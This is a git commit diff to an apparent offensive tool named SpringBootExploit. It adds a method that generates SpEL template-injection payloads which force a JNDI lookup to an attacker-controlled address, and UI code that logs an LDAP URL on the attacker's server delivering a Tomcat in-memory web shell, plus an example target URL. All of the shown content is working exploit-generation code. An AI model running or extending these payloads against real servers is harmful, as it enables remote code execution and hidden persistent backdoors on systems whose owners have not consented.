SpEL支持

SummerSec · SummerSec · commit 24e0da080002 · 2021-08-25T16:16:33.000+08:00
diff --git a/pom.xml b/pom.xml
@@ -7,7 +7,7 @@
     <groupId>org.example</groupId>
     <artifactId>SpringBootExploit</artifactId>
 <!--    <packaging>jar</packaging>-->
-    <version>1.0-SNAPSHOT</version>
+    <version>1.1-SNAPSHOT</version>
 
 
 <!--    <properties>-->
diff --git a/src/main/java/com/drops/ui/MainController.java b/src/main/java/com/drops/ui/MainController.java
@@ -269,9 +269,11 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) {
             if (this.gadgetOpt.getValue().equalsIgnoreCase("spelrce")){
                 SpelUtils spel = new SpelUtils();
                 String poc = spel.SpelExpr(this.vps.getText());
+                String ssti = spel.SpelSsti(this.vps.getText());
                 this.logTextArea.appendText(Utils.log("Payload 食用方法示例：http://127.0.0.1:9091/article?id=Payload"));
                 this.logTextArea.appendText(Utils.log("ldap://" + this.vps.getText() + ":1389/basic/TomcatMemShell3"));
                 this.logTextArea.appendText(Utils.log(poc));
+                this.logTextArea.appendText(Utils.log(ssti));
             }else {
                 boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(),
                         this.vps.getText(),this.gadgetOpt.getValue(),"TomcatEcho");
diff --git a/src/main/java/com/drops/utils/SpelUtils.java b/src/main/java/com/drops/utils/SpelUtils.java
@@ -42,10 +42,28 @@ public String SpelExpr(String cmd){
 
     }
 
+    public String SpelSsti(String cmd){
+
+        String ssti = "${\"a\".getClass().forName(\"javax.naming.InitialContext\").getMethod(\"lookup\",\"\".getClass()).invoke(\"\".getClass().forName(\"javax.naming.InitialContext\").newInstance(),";
+        StringBuilder sb = new StringBuilder();
+        char[] ch = cmd.toCharArray();
+        for (int i=0 ; i<ch.length; i++){
+            sb.append("0x" + HexUtil.toHex(Integer.valueOf(ch[i]).intValue()));
+            if (i != ch.length -1 ){
+                sb.append(",");
+            }
+        }
+        ssti += sb.append(" )}").toString();
+        System.out.println(ssti);
+
+
+        return ssti;
+    }
+
     public static void main(String[] args) {
        SpelUtils s = new SpelUtils();
 //       s.SpelExpr(s.rmi);
-       s.SpelExpr(s.rmi);
+       s.SpelSsti(s.rmi);
 
     }
 
